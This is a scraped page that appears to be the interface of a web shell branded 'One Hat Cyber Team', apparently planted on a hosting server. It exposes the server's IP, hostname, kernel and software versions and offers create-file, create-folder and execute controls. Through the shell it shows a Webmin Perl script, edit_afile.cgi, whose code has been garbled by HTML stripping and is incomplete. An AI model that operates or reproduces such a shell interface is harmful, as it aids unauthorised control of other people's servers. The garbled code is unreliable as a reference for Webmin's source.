⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.133
Server IP:
185.119.109.197
Server:
Linux managedhosting.chostar.me 5.15.0-160-generic #170-Ubuntu SMP Wed Oct 1 10:06:56 UTC 2025 x86_64
Server Software:
Apache
PHP Version:
8.1.33
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
share
/
webmin
/
qmailadmin
/
View File Name :
edit_afile.cgi
#!/usr/bin/perl # edit_afile.cgi # Display the contents of an address file require (-r 'sendmail-lib.pl' ? './sendmail-lib.pl' : -r 'qmail-lib.pl' ? './qmail-lib.pl' : './postfix-lib.pl'); &ReadParse(); if (substr($in{'file'}, 0, length($access{'apath'})) ne $access{'apath'}) { &error(&text('afile_efile', $in{'file'})); } &ui_print_header(undef, $text{'afile_title'}, ""); &open_readfile(FILE, $in{'file'}); @lines =
; close(FILE); print "
",&text('afile_desc', "
$in{'file'}
"),"
\n"; print "
\n"; print "
\n"; print "
\n"; print "
\n"; print "
", join("", @lines),"
\n"; print "
", "
\n"; print "
\n"; &ui_print_footer("edit_alias.cgi?name=$in{'name'}&num=$in{'num'}",$text{'aform_return'});